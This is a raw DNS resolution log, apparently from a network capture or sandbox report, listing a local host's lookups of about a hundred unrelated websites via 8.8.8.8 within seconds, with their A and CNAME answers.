                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.724689960 CEST8.8.8.8192.168.2.40xaf88No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.732189894 CEST8.8.8.8192.168.2.40x6bffNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.732189894 CEST8.8.8.8192.168.2.40x6bffNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.797394037 CEST8.8.8.8192.168.2.40x8ea5No error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.800498962 CEST8.8.8.8192.168.2.40x6767No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.800498962 CEST8.8.8.8192.168.2.40x6767No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.805485964 CEST8.8.8.8192.168.2.40xaaf3No error (0)www.pdqhomes.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.805485964 CEST8.8.8.8192.168.2.40xaaf3No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.805485964 CEST8.8.8.8192.168.2.40xaaf3No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.805485964 CEST8.8.8.8192.168.2.40xaaf3No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.942327023 CEST8.8.8.8192.168.2.40x4cf6No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.942327023 CEST8.8.8.8192.168.2.40x4cf6No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.942327023 CEST8.8.8.8192.168.2.40x4cf6No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.947021961 CEST8.8.8.8192.168.2.40x1b7eNo error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.947021961 CEST8.8.8.8192.168.2.40x1b7eNo error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.947042942 CEST8.8.8.8192.168.2.40x69afNo error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.968605995 CEST8.8.8.8192.168.2.40x40a5No error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.968605995 CEST8.8.8.8192.168.2.40x40a5No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.968605995 CEST8.8.8.8192.168.2.40x40a5No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.212770939 CEST8.8.8.8192.168.2.40xd681No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.212770939 CEST8.8.8.8192.168.2.40xd681No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.212770939 CEST8.8.8.8192.168.2.40xd681No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.245568037 CEST8.8.8.8192.168.2.40xd26aNo error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.245568037 CEST8.8.8.8192.168.2.40xd26aNo error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.317071915 CEST8.8.8.8192.168.2.40xd92fNo error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.317071915 CEST8.8.8.8192.168.2.40xd92fNo error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.317071915 CEST8.8.8.8192.168.2.40xd92fNo error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.351839066 CEST8.8.8.8192.168.2.40xa3f6No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.605173111 CEST8.8.8.8192.168.2.40xec9fNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.605173111 CEST8.8.8.8192.168.2.40xec9fNo error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.630815983 CEST8.8.8.8192.168.2.40xb769No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.630815983 CEST8.8.8.8192.168.2.40xb769No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.713665962 CEST8.8.8.8192.168.2.40xe80bNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.744518042 CEST8.8.8.8192.168.2.40x5c88No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.744518042 CEST8.8.8.8192.168.2.40x5c88No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.744518042 CEST8.8.8.8192.168.2.40x5c88No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.823043108 CEST8.8.8.8192.168.2.40xf64dNo error (0)www.petsfan.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.823043108 CEST8.8.8.8192.168.2.40xf64dNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.823043108 CEST8.8.8.8192.168.2.40xf64dNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.823043108 CEST8.8.8.8192.168.2.40xf64dNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.111042976 CEST8.8.8.8192.168.2.40x88a0No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.120490074 CEST8.8.8.8192.168.2.40x94cdNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.120490074 CEST8.8.8.8192.168.2.40x94cdNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.137295961 CEST8.8.8.8192.168.2.40x6bf0Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.185024977 CEST8.8.8.8192.168.2.40xb393No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.185024977 CEST8.8.8.8192.168.2.40xb393No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.185024977 CEST8.8.8.8192.168.2.40xb393No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.261789083 CEST8.8.8.8192.168.2.40xbbaeName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.264615059 CEST8.8.8.8192.168.2.40x7cd8No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.264615059 CEST8.8.8.8192.168.2.40x7cd8No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.353059053 CEST8.8.8.8192.168.2.40x640aNo error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.432359934 CEST8.8.8.8192.168.2.40x90dNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.432359934 CEST8.8.8.8192.168.2.40x90dNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.518773079 CEST8.8.8.8192.168.2.40x2fe8No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.518773079 CEST8.8.8.8192.168.2.40x2fe8No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.521420956 CEST8.8.8.8192.168.2.40xd3cbNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.596931934 CEST8.8.8.8192.168.2.40x196cNo error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.738645077 CEST8.8.8.8192.168.2.40x4e75No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.738645077 CEST8.8.8.8192.168.2.40x4e75No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.742913008 CEST8.8.8.8192.168.2.40xc5f9No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.742913008 CEST8.8.8.8192.168.2.40xc5f9No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.763966084 CEST8.8.8.8192.168.2.40x4132No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.763966084 CEST8.8.8.8192.168.2.40x4132No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.868839025 CEST8.8.8.8192.168.2.40x77bcNo error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.868839025 CEST8.8.8.8192.168.2.40x77bcNo error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.954952002 CEST8.8.8.8192.168.2.40xd28cNo error (0)www.cokocoko.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.954952002 CEST8.8.8.8192.168.2.40xd28cNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.954952002 CEST8.8.8.8192.168.2.40xd28cNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.954952002 CEST8.8.8.8192.168.2.40xd28cNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.635363102 CEST8.8.8.8192.168.2.40x34d0No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.635363102 CEST8.8.8.8192.168.2.40x34d0No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.679861069 CEST8.8.8.8192.168.2.40x754dNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.700493097 CEST8.8.8.8192.168.2.40x74a9No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.700493097 CEST8.8.8.8192.168.2.40x74a9No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.750853062 CEST8.8.8.8192.168.2.40x5df9No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.750853062 CEST8.8.8.8192.168.2.40x5df9No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.760560036 CEST8.8.8.8192.168.2.40xf44cNo error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.760560036 CEST8.8.8.8192.168.2.40xf44cNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.760560036 CEST8.8.8.8192.168.2.40xf44cNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.804481983 CEST8.8.8.8192.168.2.40x899aNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.804481983 CEST8.8.8.8192.168.2.40x899aNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.499991894 CEST8.8.8.8192.168.2.40x54c0No error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.499991894 CEST8.8.8.8192.168.2.40x54c0No error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.503190041 CEST8.8.8.8192.168.2.40xeaacNo error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.508352041 CEST8.8.8.8192.168.2.40x2ef4No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.605988026 CEST8.8.8.8192.168.2.40x529bNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.646743059 CEST8.8.8.8192.168.2.40x37a6No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.690048933 CEST8.8.8.8192.168.2.40xd4e4No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.703442097 CEST8.8.8.8192.168.2.40xf9beName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.756120920 CEST8.8.8.8192.168.2.40xa8feNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.775399923 CEST8.8.8.8192.168.2.40x8e68No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.980823040 CEST8.8.8.8192.168.2.40xe525No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.982192039 CEST8.8.8.8192.168.2.40x5b86No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.982192039 CEST8.8.8.8192.168.2.40x5b86No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.998133898 CEST8.8.8.8192.168.2.40xee97No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.998133898 CEST8.8.8.8192.168.2.40xee97No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.476070881 CEST8.8.8.8192.168.2.40xb162No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.539257050 CEST8.8.8.8192.168.2.40x571No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.829437017 CEST8.8.8.8192.168.2.40xdf17No error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.099703074 CEST8.8.8.8192.168.2.40x698dNo error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.099703074 CEST8.8.8.8192.168.2.40x698dNo error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.109522104 CEST8.8.8.8192.168.2.40xda3eNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193747997 CEST8.8.8.8192.168.2.40xfd9dNo error (0)www.netcr.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193747997 CEST8.8.8.8192.168.2.40xfd9dNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193747997 CEST8.8.8.8192.168.2.40xfd9dNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.193747997 CEST8.8.8.8192.168.2.40xfd9dNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.265011072 CEST8.8.8.8192.168.2.40x7273No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.466588974 CEST8.8.8.8192.168.2.40x93eNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.466588974 CEST8.8.8.8192.168.2.40x93eNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.948426008 CEST8.8.8.8192.168.2.40x6572No error (0)www.x0c.com104.143.9.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.948426008 CEST8.8.8.8192.168.2.40x6572No error (0)www.x0c.com104.143.9.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.009838104 CEST8.8.8.8192.168.2.40x14acNo error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.009838104 CEST8.8.8.8192.168.2.40x14acNo error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.009838104 CEST8.8.8.8192.168.2.40x14acNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.009838104 CEST8.8.8.8192.168.2.40x14acNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.009838104 CEST8.8.8.8192.168.2.40x14acNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.009838104 CEST8.8.8.8192.168.2.40x14acNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.282737017 CEST8.8.8.8192.168.2.40x1f1No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.287177086 CEST8.8.8.8192.168.2.40xe0b2Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.540360928 CEST8.8.8.8192.168.2.40x97f9No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.719818115 CEST8.8.8.8192.168.2.40x6380No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.341569901 CEST8.8.8.8192.168.2.40x4f4aNo error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.341569901 CEST8.8.8.8192.168.2.40x4f4aNo error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.341569901 CEST8.8.8.8192.168.2.40x4f4aNo error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.341569901 CEST8.8.8.8192.168.2.40x4f4aNo error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.341569901 CEST8.8.8.8192.168.2.40x4f4aNo error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.436121941 CEST8.8.8.8192.168.2.40xa048No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.841573000 CEST8.8.8.8192.168.2.40xcf2fNo error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.863636971 CEST8.8.8.8192.168.2.40xb430No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.863636971 CEST8.8.8.8192.168.2.40xb430No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.875859976 CEST8.8.8.8192.168.2.40x82c1No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.875859976 CEST8.8.8.8192.168.2.40x82c1No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.875859976 CEST8.8.8.8192.168.2.40x82c1No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:02.227333069 CEST8.8.8.8192.168.2.40x6317No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:02.227333069 CEST8.8.8.8192.168.2.40x6317No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:02.231396914 CEST8.8.8.8192.168.2.40x4ad5No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:03.246397018 CEST8.8.8.8192.168.2.40xbd56No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:03.560551882 CEST8.8.8.8192.168.2.40xbe69No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:10.564681053 CEST8.8.8.8192.168.2.40x1dc1No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:10.564681053 CEST8.8.8.8192.168.2.40x1dc1No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:10.564681053 CEST8.8.8.8192.168.2.40x1dc1No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:11.932883024 CEST8.8.8.8192.168.2.40x6d63No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:15.636076927 CEST8.8.8.8192.168.2.40xce2fNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:15.636076927 CEST8.8.8.8192.168.2.40xce2fNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:15.636076927 CEST8.8.8.8192.168.2.40xce2fNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:15.636076927 CEST8.8.8.8192.168.2.40xce2fNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:15.636076927 CEST8.8.8.8192.168.2.40xce2fNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:16.349448919 CEST8.8.8.8192.168.2.40x354eNo error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:17.653402090 CEST8.8.8.8192.168.2.40xbf2cNo error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
